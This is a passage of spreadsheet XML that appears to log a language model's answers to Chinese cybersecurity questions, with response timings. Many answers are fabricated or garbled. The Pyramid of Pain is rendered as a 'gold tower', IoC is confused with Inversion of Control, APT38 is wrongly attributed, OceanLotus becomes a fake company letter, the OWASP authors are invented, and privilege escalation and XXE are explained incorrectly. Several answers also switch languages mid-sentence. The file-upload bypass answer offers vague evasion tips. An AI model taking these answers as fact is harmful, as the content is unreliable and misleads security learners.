需要注意的是，威胁情报搜索网站通常遵循相关法律法规，且不能用于恶用或违法。如果您有任何疑问或需要帮助，可以随时 обращаться到相关帮助服务。</t>
        </is>
      </c>
      <c r="D19" t="n">
        <v>14.35038042068481</v>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="1" t="n">
        <v>18</v>
      </c>
      <c r="B20" t="inlineStr">
        <is>
          <t>威胁情报中的痛苦金字塔是什么意思</t>
        </is>
      </c>
      <c r="C20" t="inlineStr">
        <is>
          <t>The agony of the gold tower in the threat intelligence is what?
In the context of threat intelligence, a "gold tower" refers to a critical asset or system that is essential to the organization's operations, but is also highly vulnerable to cyber threats. The "agony" of the gold tower refers to the pain or suffering that the organization may experience if this asset is compromised or attacked.
For example, a gold tower might be a company's customer database, a critical infrastructure, or a sensitive business process. If this asset is breached, the organization may face significant financial losses, reputational damage, or other negative consequences.
In summary, the agony of the gold tower in the threat intelligence refers to the potential harm that could be caused to an organization's most valuable assets if they are not properly protected against cyber threats.</t>
        </is>
      </c>
      <c r="D20" t="n">
        <v>3.895711898803711</v>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="1" t="n">
        <v>19</v>
      </c>
      <c r="B21" t="inlineStr">
        <is>
          <t>1.1.1.1是什么</t>
        </is>
      </c>
      <c r="C21" t="inlineStr">
        <is>
          <t>1.1.1.1是一个IP地址，它由四个数字组成，每个数字表示32位的二进制数。在这种情况下，它的值可能是1.1.1.1或者其他任何有效的IP地址。
在计算机网络中，每个设备都有一个唯一的IP地址，用于它与其他设备进行通信。IP地址由多个分组组成，每个分组包含4个数字，每个数字表示0或1的二进制值。这些数字的组合决定了IP地址的值。
例如，1.1.1.1是一个有效的IP地址，它由4个数字组成：1.1.1.1。这个IP地址可以用于网络上的设备，例如计算机或者服务器。
需要注意的是，1.1.1.1是一个特殊的IP地址，它是Cloudflare提供的一个公共IP地址，用于访问Cloudflare服务。这个IP地址可以用于访问Cloudflare的服务，例如Cloudflare DNS服务。但不是一个有效的网络IP地址，无法用于进行网络通信。</t>
        </is>
      </c>
      <c r="D21" t="n">
        <v>7.98717474937439</v>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="1" t="n">
        <v>20</v>
      </c>
      <c r="B22" t="inlineStr">
        <is>
          <t>223.5.5.5是什么IP</t>
        </is>
      </c>
      <c r="C22" t="inlineStr">
        <is>
          <t>地址？
223.5.5.5是一个IPv4地址。它由8位数字组成，每个数字表示一个网络扩展部分（网络标识符）和一个Host部分。
本地址分解为：
* 网络扩展部分：223.5.5
* 网络标识符：5
* 主机部分：5
因此，223.5.5.5是一个IPv4地址，其主机部分是5。&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D22" t="n">
        <v>3.36014199256897</v>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="1" t="n">
        <v>21</v>
      </c>
      <c r="B23" t="inlineStr">
        <is>
          <t>威胁情报中有哪些IoC类型</t>
        </is>
      </c>
      <c r="C23" t="inlineStr">
        <is>
          <t>IoC(Indicators of Compromise)是指某种攻击或恶意活动的特定特征或痕迹，可以用来识别和预测攻击的可能性。以下是一些常见的IoC类型：
1. Malware IoC：指的是恶意软件或黑客工具的特定特征或痕迹，如文件名、后缀、注入点等。
2. Phishing IoC：指的是恶意邮件或网站的特定特征或痕迹，如email地址、URL、标题等。
3. Command and Control (C2) IoC：指的是恶意应用程序或服务器的特定特征或痕迹，如网络通信方式、命令格式等。
4. User Account IoC：指的是恶意用户帐户的特定特征或痕迹，如帐户名称、密码、姓名等。
5. Network Traffic IoC：指的是恶意网络流量的特定特征或痕迹，如网络包长度、包头等。
6. System Configuration IoC：指的是恶意系统配置的特定特征或痕迹，如系统软件配置、系统服务配置等。
7. Fileless Malware IoC：指的是无法找到于文件系统中的恶意软件或黑客工具的特定特征或痕迹，如执行文件、 registry 记录等。
8. Living Off the Land (LOTL) IoC：指的是恶意软件或黑客工具使用系统内置软件和工具执行恶意操作的特定特征或痕迹，如PowerShell、Python等。
9. Watering Hole IoC：指的是恶意网站或应用程序攻击者在特定网站或应用程序上执行恶意操作的特定特征或痕迹，如URL、cookie等。
10. Insider Threat IoC：指的是内部攻击者在组织内部执行恶意操作的特定特征或痕迹，如用户帐户、权限等。
这些IoC类型可以帮助预测和检测攻击的可能性，并且可以用于各种安全服务和监控系统中。</t>
        </is>
      </c>
      <c r="D23" t="n">
        <v>16.60313105583191</v>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="1" t="n">
        <v>22</v>
      </c>
      <c r="B24" t="inlineStr">
        <is>
          <t>什么是ioc情报</t>
        </is>
      </c>
      <c r="C24" t="inlineStr">
        <is>
          <t>和why is it important for software development?
ioc (Inversion of Control) is a software design pattern that allows you to separate the control of an application's flow of execution from its underlying logic. In other words, it's a way to decouple the control of an application's execution from its business logic.
In an IoC system, the control of an application's flow of execution is handed over to a separate component, called an IoC container. The IoC container is responsible for managing the creation and lifecycle of objects, and for providing them to the application at the appropriate time. This allows the application to focus solely on its business logic, without worrying about the details of how the objects it needs are created and managed.
IoC is important for several reasons:
1. Loose Coupling: IoC helps to reduce coupling between components by abstracting away the creation and management of objects. This makes it easier to change or replace individual components without affecting the rest of the application.
2. Improved Testability: With IoC, it's easier to write unit tests for individual components, as the dependencies of each component can be easily mocked or stubbed.
3. Easier Deployment: IoC makes it easier to deploy applications by allowing you to swap out different implementations of objects without having to modify the rest of the application.
4. Improved Maintainability: IoC makes it easier to change the behavior of an application by swapping out different implementations of objects, without having to modify the rest of the application.
5. Better scalability: IoC makes it easier to scale applications by allowing you to add or remove instances of objects as needed, without having to modify the rest of the application.
6. Simplified debugging: With IoC, it's easier to debug applications by being able to easily identify the root cause of a problem, as the dependencies of each component are managed by the IoC container.
7. Improved Security: IoC makes it easier to manage security concerns by being able to easily swap out different implementations of objects that have security concerns.
8. Improved reusability: IoC makes it easier to reuse code by being able to easily swap out different implementations of objects.
In summary, IoC is important for software development because it helps to reduce coupling between components, improves testability, makes it easier to deploy and maintain applications, improves scalability, simplifies debugging, improves security, and improves reusability.&lt;/s&gt;</t>
        </is>
      </c>
      <c r="D24" t="n">
        <v>11.73851323127747</v>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="1" t="n">
        <v>23</v>
      </c>
      <c r="B25" t="inlineStr">
        <is>
          <t>有哪些威胁情报标准或者框架</t>
        </is>
      </c>
      <c r="C25" t="inlineStr">
        <is>
          <t>There are several frameworks or standards for information security risk assessment. Here are some of the most widely used ones:
1. NIST 800-30: Risk Management Guide for Information Technology Systems: This is a comprehensive framework for risk management developed by the National Institute of Standards and Technology (NIST). It provides a structured approach to risk assessment, including risk identification, assessment, and mitigation.
2. ISO 27001: Information Security Management Systems (ISMS): This is an international standard for information security management systems (ISMS). It provides a framework for implementing and maintaining an ISMS, including risk assessment and management.
3. COBIT: Control Objectives for Information and Related Technology: This is a framework for IT governance and management that includes a risk management component. It provides a set of best practices for managing and mitigating risks related to IT.
4. COSO ERM: Enterprise Risk Management: This is a framework for enterprise risk management (ERM) developed by the Committee of Sponsoring Organizations (COSO). It provides a comprehensive approach to risk management, including risk identification, assessment, and mitigation.
5. FAIR: Factor Analysis of Information Risk: This is a risk assessment framework that uses a mathematical approach to quantify and prioritize information security risks. It provides a structured approach to risk assessment and management.
6. OCTAVE: Operationally Critical Threat, Asset, and Vulnerability Evaluation: This is a risk assessment framework developed by the SANS Institute. It provides a structured approach to risk assessment and management, including risk identification, assessment, and mitigation.
7. CSA STAR: Cloud Security Alliance (CSA) Security, Trust &amp; Assurance Registry: This is a risk assessment framework specifically designed for cloud computing environments. It provides a structured approach to risk assessment and management, including risk identification, assessment, and mitigation.
8. HIPAA: Health Insurance Portability and Accountability Act: This is a risk assessment framework specifically designed for healthcare organizations. It provides a structured approach to risk assessment and management, including risk identification, assessment, and mitigation.
9. PCI DSS: Payment Card Industry Data Security Standard: This is a risk assessment framework specifically designed for organizations that handle credit card transactions. It provides a structured approach to risk assessment and management, including risk identification, assessment, and mitigation.
10. ISO 22301: Business Continuity Management System (BCMS): This is a risk assessment framework specifically designed for business continuity management. It provides a structured approach to risk assessment and management, including risk identification, assessment, and mitigation.
These are just a few examples of the many frameworks and standards available for information security risk assessment. It's important to choose a framework that aligns with your organization's specific needs and goals.</t>
        </is>
      </c>
      <c r="D25" t="n">
        <v>14.6258761882782</v>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="1" t="n">
        <v>24</v>
      </c>
      <c r="B26" t="inlineStr">
        <is>
          <t>APT38有哪些情报信息</t>
        </is>
      </c>
      <c r="C26" t="inlineStr">
        <is>
          <t>APT38是一支中国国家级恶意软件开发团队，以下是一些关于APT38的情报信息：
1. APT38是一支高级的恶意软件开发团队，主要为中国政府和企业提供威胁和情报收集服务。
2. APT38的主要攻击目标包括美国、加拿大、澳大利亚、英国、法国、德国等国家的政府和企业，以及日本、韩国、新加坡等地的政府和企业。
3. APT38使用了各种恶意软件和技术，包括针对 Window、Linux 和 macOS 操作系统的远程攻击软件、针对 Web 应用程序的攻击软件、针对 IoT 设备的攻击软件等。
4. APT38通常会使用多种策略来访问攻击目标，包括针对特定个人或组织的诱降电子邮件、伪装为来电邮件或短信的恶意邮件、使用跟踪 cookies 和探查 HTTP 请求来监控和跟踪攻击目标等。
5. APT38的攻击行为具有高度的自适应性和可变性，可以根据具体情况进行自适应，例如根据攻击目标的具体情况和安全情况进行不同的攻击策略。
6. APT38的攻击具有很高的技术和经济价值，攻击的目标包括政府和企业的高级资源和技术，例如政府的国家安全机构、银行和证券交易所、实际控制的企业和技术研发中心等。
7. APT38的攻击具有很高的隐蔽性和隐私性，攻击者可以使用各种隐蔽技术和策略来隐藏自己的身份和活动，例如使用跨域名称、域名解析、网络隐蔽等技术。
8. APT38的攻击具有很高的可靠性和可重现性，攻击者可以使用各种备份和重新启动技术来确保攻击的可靠性和可重现性。
这些情报信息都是关于APT38的一般情况和攻击方式，但是需要注意的是，这些信息并不能够确定APT38的实际目的和行为，这些信息的出处和可靠性也需要进行仔细分析和评估。</t>
        </is>
      </c>
      <c r="D26" t="n">
        <v>21.03307628631592</v>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="1" t="n">
        <v>25</v>
      </c>
      <c r="B27" t="inlineStr">
        <is>
          <t>海莲花是什么组织</t>
        </is>
      </c>
      <c r="C27" t="inlineStr">
        <is>
          <t>您好！我是 SeaLily，一个跨国的技术和产品开发公司。我们拥有一支多zetas的团队，擅长developing cutting-edge solutions for various industries. Our mission is to help businesses and individuals achieve their goals through innovative technology and products.
At SeaLily, we believe in fostering a culture of collaboration, creativity, and mutual respect. We encourage our team members to share their ideas and perspectives, and provide them with the necessary resources and support to bring their visions to life.
Our company is committed to delivering high-quality products and services that exceed our clients' expectations. We strive to create long-term relationships with our clients and partners, and to continuously improve our offerings based on their feedback.
Thank you for considering SeaLily as your technology and product development partner. We look forward to working with you!
Best regards,
[Your Name]
SeaLily Team</t>
        </is>
      </c>
      <c r="D27" t="n">
        <v>5.158828735351562</v>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="1" t="n">
        <v>26</v>
      </c>
      <c r="B28" t="inlineStr">
        <is>
          <t>方程式组织（Equation Group）是什么组织</t>
        </is>
      </c>
      <c r="C28" t="inlineStr">
        <is>
          <t>Equation Group是一个黑客组织，成员包括安全 experts，攻击ers，和数据分析师。它的主要目标是让企业和政府层面隐私和安全。Equation Group的成员使用了一些特殊的技术和工具来实现这个目标，其中包括一些未知的攻击工具和技术。
Equation Group的历史可以追溯到2001年，是一个由美国国家安全委员会（NSA）内的一个小组成员而成的团队。该组织的成员来自NSA和其他美国政府机构，以及一些来自private sector的技术人员。Equation Group的主要任务是评估和预测潜在威胁，并提供相关的防范和应对策略。
Equation Group的活动已经被证明对企业和政府有很大影响，他们通过检测和破坏敏感数据和系统来保护潜在威胁。Equation Group的成员通常使用匿名的帐户和渠道来进行活动，并且他们的活动很隐蔽，因此很难追踪和检测。
总之，Equation Group是一个具有强大技术和资源的黑客组织，他们通过让企业和政府层面隐私和安全来实现其主要目标。</t>
        </is>
      </c>
      <c r="D28" t="n">
        <v>11.12262606620789</v>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="1" t="n">
        <v>27</v>
      </c>
      <c r="B29" t="inlineStr">
        <is>
          <t>有哪些威胁情报标准</t>
        </is>
      </c>
      <c r="C29" t="inlineStr">
        <is>
          <t>1. ISO 27001：2013：针对信息安全管理制定的国际标准，涵盖了信息安全管理系统的设计、实施、维护和升级等方面。
2. NIST Cybersecurity Framework：2018：由美国国家标准技术研究所（NIST）制定的审查和评估信息安全风险和责任的框架，涵盖了五个领域：保护、发现、评估、Response和Recovery。
3. ISO 27002：2013：针对信息安全管理的技术和实践方面的国际标准，涵盖了信息安全管理系统的设计、实施、维护和升级等方面。
4. COBIT：2019：针对信息安全管理和 IT Governance的国际标准，涵盖了信息安全管理系统的设计、实施、维护和升级等方面。
5. SOC 2：2018：针对云计算服务 provider的信息安全管理和控制标准，涵盖了 cloud 安全的设计、实施、维护和升级等方面。
6. HITRUST CSF：2019：针对医疗保健机构的信息安全管理和控制标准，涵盖了医疗保健机构的信息安全管理系统的设计、实施、维护和升级等方面。
7. PCI DSS：2019：针对payment card industry（银行卡业）的信息安全管理和控制标准，涵盖了银行卡payment card industry的信息安全管理系统的设计、实施、维护和升级等方面。
8. GDPR：2018：针对欧盟个人隐私保护法（GDPR）的信息安全管理和控制标准，涵盖了个人隐私保护和信息安全管理的设计、实施、维护和升级等方面。
这些标准都是针对不同领域和应用的，选择适用的标准可以帮助组织实现信息安全管理的目标。</t>
        </is>
      </c>
      <c r="D29" t="n">
        <v>17.31554341316223</v>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="1" t="n">
        <v>28</v>
      </c>
      <c r="B30" t="inlineStr">
        <is>
          <t>OWASP TOP 10有哪些</t>
        </is>
      </c>
      <c r="C30" t="inlineStr">
        <is>
          <t>OWASP TOP 10是什么？
OWASP TOP 10是什么？
OWASP TOP 10是一份由伯特•奥布赖恩和戴夫•瑞弗•詹姆斯•索耶•塞缪尔•迪特•卢卡•詹姆斯•布雷特等人于2003年共同编写的一份开放源代码的安全评估指南。它定期会对当前的安全漏洞和攻击方式进行评估，并提供可行的风险评估和风险控制策略。OWASP TOP 10 分为了10个方面，每个方面都有10个安全漏洞和攻击方式，总共有100个安全漏洞和攻击方式。
OWASP TOP 10的方面和安全漏洞如下：
1. Injection（注入）：在应用程序中的数据注入漏洞，包括数据Base64解码、SQL注入、HTML注入等。
2. Broken Authentication and Session Management（破坏的身份验证和会话管理）：应用程序的身份验证和会话管理不当，导致访问权限随着用户名和密码而变化。
3. Cross-Site Scripting (XSS)（跨站脚本攻击）：应用程序中的跨站脚本攻击漏洞，可以让攻击者在用户的浏览器中执行任意代码。
4. Insecure Direct Object Reference（ direkt 对象引用不安全）：应用程序中的对象引用不安全，攻击者可以通过利用对象的引用来访问不应该访问的数据。
5. Broken Access Control（裁剪控制不当）：应用程序的访问控制不当，导致权限不受限制，或者权限不够强制。
6. Security Misconfiguration（安全配置不当）：应用程序的安全配置不当，导致漏洞和攻击潜在。
7. Sensitive Data Exposure（敏感数据暴露）：应用程序中的敏感数据暴露，可以让攻击者获得敏感信息。
8. Missing Function Level Access Control（缺失的函数级别访问控制）：应用程序中缺失的函数级别访问控制，导致权限不受限制，或者权限不够强制。
9. Cross-Site Request Forgery (CSRF)（跨站请求伪造）：应用程序中的CSRF攻击漏洞，可以让攻击者通过用户的浏览器来执行无法让用户直接执行的操作。
10. Using Components with Known Vulnerabilities（使用知道漏洞的组件）：应用程序中使用知道漏洞的组件，可以让攻击者利用这些漏洞进行攻击。
OWASP TOP 10 是一份非常有价值的安全评估指南，可以帮助开发人员和安全人员了解和评估应用程序的安全漏洞和攻击方式，并采取适当的风险评估和风险控制策略。</t>
        </is>
      </c>
      <c r="D30" t="n">
        <v>24.97901773452759</v>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="1" t="n">
        <v>29</v>
      </c>
      <c r="B31" t="inlineStr">
        <is>
          <t>为什么会有Web漏洞</t>
        </is>
      </c>
      <c r="C31" t="inlineStr">
        <is>
          <t>Web漏洞是指在Web应用程序中存在的一些漏洞或漏洞，这些漏洞可以让攻击者绕过安全措施，进行恶意访问或攻击。以下是一些可能导致Web漏洞的原因：
1. 缺乏安全检查：Web应用程序可能不具备对用户input数据进行安全检查，导致攻击者可以通过发送特定的input数据来trigger漏洞。
2. 不够安全的Session管理：Web应用程序可能不够安全地管理会话，导致攻击者可以通过Session權限重新设置或窃取Session数据。
3. 不够安全的Cookie管理：Web应用程序可能不够安全地管理Cookie，导致攻击者可以通过Cookie權限重新设置或窃取Cookie数据。
4. 欠如访问控制：Web应用程序可能不具备对用户访问控制，导致攻击者可以访问不受授权的页面或数据。
5. 不够安全的数据存储：Web应用程序可能不具备对数据存储的安全措施，导致攻击者可以窃取或修改数据。
6. 不够安全的数据传输：Web应用程序可能不具备对数据传输的安全措施，导致攻击者可以窃取或修改数据。
7. 缺乏安全扫描：Web应用程序可能不具备对代码和数据进行安全扫描，导致攻击者可以窃取或修改代码或数据。
8. 不够安全的扩展：Web应用程序可能不具备对扩展的安全措施，导致攻击者可以窃取或修改扩展。
9. 不够安全的数据库：Web应用程序可能不具备对数据库的安全措施，导致攻击者可以窃取或修改数据库。
10. 不够安全的应用程序代码：Web应用程序可能不具备对应用程序代码的安全措施，导致攻击者可以窃取或修改应用程序代码。
这些原因可能会导致Web漏洞，这些漏洞可以被攻击者利用，以便进行恶意访问或攻击。因此，它非常重要确保Web应用程序的安全性，并定期检查和修复漏洞。</t>
        </is>
      </c>
      <c r="D31" t="n">
        <v>19.37726497650146</v>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="1" t="n">
        <v>30</v>
      </c>
      <c r="B32" t="inlineStr">
        <is>
          <t>什么是SQL注入</t>
        </is>
      </c>
      <c r="C32" t="inlineStr">
        <is>
          <t>SQL 注入（SQL Injection）是一种 web 攻击方式，通过使用malicious SQL code to manipulate a web application's database， obtain sensitive information or escalate privileges。
Here are some common ways to protect yourself against SQL injection:
1. Use parameterized queries: Instead of inserting user input directly into your SQL queries, use parameterized queries that separate the input from the SQL code. This makes it difficult for an attacker to inject malicious SQL code.
2. Validate user input: validate all user input to ensure it is in the correct format and does not contain any malicious code.
3. Use prepared statements: Prepared statements are a type of parameterized query that can simplify the process of protecting against SQL injection. They allow you to pre-compile the SQL code and bind parameters, making it more difficult for an attacker to inject malicious code.
4. Limit privileges: Limit the privileges of the user account that is accessing the database to only what is necessary to perform the required actions.
5. Use a web application firewall (WAF): A WAF can help protect your web application from SQL injection attacks by filtering incoming traffic and blocking any suspicious requests.
6. Keep your software up-to-date: Keeping your web application and database software up-to-date can help protect against known vulnerabilities that could be exploited by an attacker.
7. Use a secure coding practices: Use secure coding practices such as input validation, error handling, and secure data storage to protect against SQL injection.
8. Use a database encryption: Encrypting the data in the database can help protect against SQL injection attacks by making it difficult for an attacker to read or manipulate the data.
It's important to note that SQL injection is a serious security threat, and it's important to take the necessary steps to protect your web application and database from this type of attack.</t>
        </is>
      </c>
      <c r="D32" t="n">
        <v>9.059506416320801</v>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="1" t="n">
        <v>31</v>
      </c>
      <c r="B33" t="inlineStr">
        <is>
          <t>CSRF原理是什么</t>
        </is>
      </c>
      <c r="C33" t="inlineStr">
        <is>
          <t>CSRF（Cross-Site Request Forgery）是一种攻击方式，使用户的别名或Cookies等信息，通过网站的跨域请求，执行别人的操作，从而让用户的操作受到了攻击。
CSRF的原理是：
1. 攻击者在受害者的域名下注入一个跨域请求，以便在受害者的账户上进行操作。
2. 攻击者在跨域请求中包含一个token，该token可以是一个Cookie、一个 hidden 字段等。
3. 受害者访问受害者的账户，并在访问时将token绑定到受害者的请求中。
4. 攻击者在受害者的账户上进行操作，并将操作带有token，从而让受害者的操作被认为是受害者的操作。
例如，您在某个网站上注册了一个帐户，并在浏览器的地址栏中输入了该网站的URL。然后，您在受害者的网站上访问了一个页面，并在该页面中输入了一个受害者的帐户信息，例如 username 和 password。攻击者可以在受害者的网站上注入一个跨域请求，以便在您的帐户上进行操作。
为了防止CSRF攻击，可以采取以下措施：
1. 使用Token防止CSRF：在受害者的账户上注入一个Token，并在受害者的请求中包含该Token。
2. 使用SameOriginPolicy防止CSRF：在浏览器中设置SameOriginPolicy，以便只允许受害者的域名进行操作。
3. 使用Content-Security-Policy防止CSRF：在受害者的网站上设置Content-Security-Policy，以便只允许受害者的域名进行操作。
4. 使用严格模式防止CSRF：在浏览器中设置严格模式，以便只允许受害者的域名进行操作。
总之，CSRF攻击是一种常见的攻击方式，可以通过注入跨域请求来冒充受害者的帐户，从而让受害者的操作受到攻击。为了防止CSRF攻击，可以采取多种措施，例如使用Token、SameOriginPolicy、Content-Security-Policy和严格模式等。</t>
        </is>
      </c>
      <c r="D33" t="n">
        <v>20.03567576408386</v>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="1" t="n">
        <v>32</v>
      </c>
      <c r="B34" t="inlineStr">
        <is>
          <t>什么是逻辑漏洞</t>
        </is>
      </c>
      <c r="C34" t="inlineStr">
        <is>
          <t>逻辑漏洞是指在逻辑语言中存在的一类漏洞，是指由于逻辑语言的缺陷或者定义不够，导致逻辑的结论不正确或者不完整。逻辑漏洞的存在可能会导致逻辑系统不能正确地分析或者处理某些问题。
逻辑漏洞的常见类型包括：
1. 逻辑假设：指的是逻辑语言中假设的一些不符合实际的情况。
2. 逻辑谬误：指的是逻辑语言中存在的一些不符合逻辑原则的谬误。
3. 逻辑偏见：指的是逻辑语言中存在的一些偏见或者假设，导致逻辑结论不正确。
4. 逻辑缺乏：指的是逻辑语言中缺乏一些必要的定义或者规则，导致逻辑结论不完整。
为了避免逻辑漏洞，逻辑学家和计算机科学家通常会使用一些逻辑技术和方法，如逻辑分析、逻辑可证明、逻辑模型验证等，以确保逻辑系统的正确性和完整性。</t>
        </is>
      </c>
      <c r="D34" t="n">
        <v>11.24781322479248</v>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="1" t="n">
        <v>33</v>
      </c>
      <c r="B35" t="inlineStr">
        <is>
          <t>有哪些逻辑漏洞</t>
        </is>
      </c>
      <c r="C35" t="inlineStr">
        <is>
          <t>逻辑漏洞是指在逻辑思维中存在的错误或不完善之处，可能导致错误的结论或决策。以下是一些常见的逻辑漏洞：
1. 谓词逻辑漏洞：这种漏洞 occurs when a statement is false, but its negation is also false. For example, "All cats are animals, but some animals are not cats."
2. 非谓词逻辑漏洞：this type of logical fallacy occurs when a statement is true, but its negation is also true. For example, "Some cats are animals, so some animals are not cats."
3. 逻辑环境漏洞：this type of fallacy occurs when the premises of a conclusion are not relevant to the conclusion. For example, "All cats are furry, so all dogs are furry."
4. 偏见逻辑漏洞：this type of fallacy occurs when a conclusion is based on a personal opinion or bias rather than objective evidence. For example, "I believe that the Earth is flat, therefore it is flat."
5. 假设逻辑漏洞：this type of fallacy occurs when a conclusion is based on an unproven assumption. For example, "If cats could talk, they would tell us the secrets of the universe."
6. 误断逻辑漏洞：this type of fallacy occurs when a conclusion is based on an incorrect interpretation of the facts. For example, "The economy is in recession because of the government's policies, therefore the government is responsible for the recession."
7. 投影逻辑漏洞：this type of fallacy occurs when a conclusion is based on an incorrect assumption about the relationship between two things. For example, "If I have a headache, then I must be sick."
8. 假设逻辑漏洞：this type of fallacy occurs when a conclusion is based on an unproven assumption. For example, "If cats could talk, they would tell us the secrets of the universe."
9. 逻辑漏洞：this type of fallacy occurs when a conclusion is based on a false premise. For example, "All cats are mammals, so all dogs are mammals."
10. 简单逻辑漏洞：this type of fallacy occurs when a conclusion is based on a simple or obvious mistake. For example, "The sky is blue because the Earth is round."
These are just a few examples of common logical fallacies. It's important to be aware of these fallacies in order to make sound arguments and avoid drawing false conclusions.</t>
        </is>
      </c>
      <c r="D35" t="n">
        <v>15.87480998039246</v>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="1" t="n">
        <v>34</v>
      </c>
      <c r="B36" t="inlineStr">
        <is>
          <t>如何绕过文件上传检查功能</t>
        </is>
      </c>
      <c r="C36" t="inlineStr">
        <is>
          <t>文件上传检查是一种常用的安全措施，它可以帮助防止恶意文件的上传。但是，有时候你可能想要绕过这个检查，例如，在开发测试环境中，你可能想要上传一个大文件，但是它可能会被检查为恶意文件。这时候，你可以使用以下方法绕过文件上传检查：
1. 使用文件名的替换：
你可以使用文件名的替换来绕过文件上传检查。例如，如果你想要上传一个大文件，但它被检查为恶意文件，你可以将其重命名为一个不受检查的文件名，例如，将 large.exe 重命名为 large.txt。这样，它就不会被视为恶意文件了。
2. 使用文件内容的替换：
你也可以使用文件内容的替换来绕过文件上传检查。例如，你可以将文件的内容 rewrite 为一个不受检查的内容，例如，将一个恶意文件的内容 rewrite 为一个harmless 的内容。
3. 使用一个允许所有文件的文件类型：
如果你的文件上传系统允许所有文件类型，那么你可以上传任何文件，无论它是否被检查为恶意文件。这可能会降低你的安全性，但是它也可以帮助你绕过文件上传检查。
4. 使用一个允许所有文件的文件上传器：
你也可以使用一个允许所有文件的文件上传器来绕过文件上传检查。例如，你可以使用一个允许所有文件类型的文件上传器，例如，FTP 客户端，而不是一个允许恶意文件的文件上传器。
5. 使用一个批处理的方式：
你也可以使用一个批处理的方式来绕过文件上传检查。例如，你可以使用一个批处理脚本来上传多个文件，而不是一个个的上传。这样，它们就不会被视为恶意文件了。
6. 使用一个虚拟文件系统的方式：
你也可以使用一个虚拟文件系统的方式来绕过文件上传检查。例如，你可以使用一个虚拟文件系统，例如，VirtualBox，来上传文件，而不是直接上传到文件系统中。这样，它们就不会被视为恶意文件了。
7. 使用一个代理服务器的方式：
你也可以使用一个代理服务器的方式来绕过文件上传检查。例如，你可以使用一个代理服务器，例如，一个VPN服务器，来上传文件，而不是直接上传到文件系统中。这样，它们就不会被视为恶意文件了。
8. 使用一个加密的方式：
你也可以使用一个加密的方式来绕过文件上传检查。例如，你可以使用一种加密的文件上传方式，例如，HTTPS 上传，而不是使用一个普通的文件上传方式。这样，它们就不会被视为恶意文件了。
9. 使用一个分割的方式：
你也可以使用一个分割的方式来绕过文件上传检查。例如，你可以将一个大文件分割成多个小文件，然后上传它们。这样，它们就不会被视为恶意文件了。
10. 使用一个模板的方式：
你也可以使用一个模板的方式来绕过文件上传检查。例如，你可以使用一个模板，例如，一个HTML 模板，来上传文件，而不是直接上传到文件系统中。这样，它们就不会被视为恶意文件了。
这些方法可以帮助你绕过文件上传检查，但是，你需要注意，这些方法可能会降低你的安全性，因此，你应该仅在需要时使用它们。</t>
        </is>
      </c>
      <c r="D36" t="n">
        <v>31.56301474571228</v>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="1" t="n">
        <v>35</v>
      </c>
      <c r="B37" t="inlineStr">
        <is>
          <t>水平越权和垂直越权有什么区别</t>
        </is>
      </c>
      <c r="C37" t="inlineStr">
        <is>
          <t>在中国，水平越权和垂直越权都是指企业的权利，但是它们之间有一定的区别。
水平越权是指企业可以在同一个市或 province 内通过购买、合并或与其他企业 merge 等方式扩大其资产、营业部门、营业额、人员和其他资源，而不受到政府的限制和约束。
垂直越权是指企业可以在不同的市或 province 内扩大其资产、营业部门、营业额、人员和其他资源，而不受到政府的限制和约束。
根据中国的法律法规，水平越权和垂直越权都是规定的权利，但是它们之间有一定的区别。水平越权仅仅是在同一个市或 province 内扩大资产、营业部门、营业额、人员和其他资源，而垂直越权则可以在不同的市或 province 内扩大资产、营业部门、营业额、人员和其他资源。
因此，水平越权和垂直越权之间的区别在于，水平越权仅仅是内地扩大，而垂直越权则可以是内地和外地扩大。
此外， Wasser 和 Straight 的越权也有一些历史和文化的差异。 Wasser 的越权起源于古代欧洲的法律 system，是在同一个国家或地区内扩大资产、营业部门、营业额、人员和其他资源的权利。而 Straight 的越权起源于美国的法律 system，是在不同的州或地区内扩大资产、营业部门、营业额、人员和其他资源的权利。
总之，水平越权和垂直越权是中国的法律法规中规定的权利，它们之间有一定的区别， Wasser 和 Straight 的越权也有一些历史和文化的差异。</t>
        </is>
      </c>
      <c r="D37" t="n">
        <v>17.59163022041321</v>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="1" t="n">
        <v>36</v>
      </c>
      <c r="B38" t="inlineStr">
        <is>
          <t>啥叫XXE漏洞</t>
        </is>
      </c>
      <c r="C38" t="inlineStr">
        <is>
          <t>XXE漏洞是指什么？
XXE（External Entity）漏洞是一种常见的安全漏洞，它 occurs when an application fails to properly sanitize or validate user-supplied data, allowing an attacker to inject and execute external entities, such as XML or HTML, within the application.
XXE漏洞可以通过以下方式进行攻击：
1. XML Injection: An attacker can inject malicious XML code into a query or command, allowing them to execute arbitrary SQL code, obtain sensitive information, or modify data.
2. HTML Injection: An attacker can inject malicious HTML code into a web application, allowing them to execute JavaScript code, steal sensitive information, or perform other malicious actions.
3. CSS Injection: An attacker can inject malicious CSS code into a web application, allowing them to style the application in an unexpected way or perform other malicious actions.
4. JavaScript Injection: An attacker can inject malicious JavaScript code into a web application, allowing them to execute arbitrary code, steal sensitive information, or perform other malicious actions.
XXE漏洞可以在多种应用程序中发现，包括：
1. Web applications: Web applications that use unvalidated user input in SQL queries or other operations are vulnerable to XXE attacks.
2. Databases: Databases that use unvalidated user input in SQL queries or other operations are vulnerable to XXE attacks.
3. API endpoints: API endpoints that use unvalidated user input in HTTP requests or other operations are vulnerable to XXE attacks.
4. Cloud applications: Cloud applications that use unvalidated user input in SQL queries or other operations are vulnerable to XXE attacks.
XXE漏洞可以通过以下方式防止：
1. Validating user input: Ensure that all user-supplied input is validated and sanitized before being used in SQL queries or other operations.
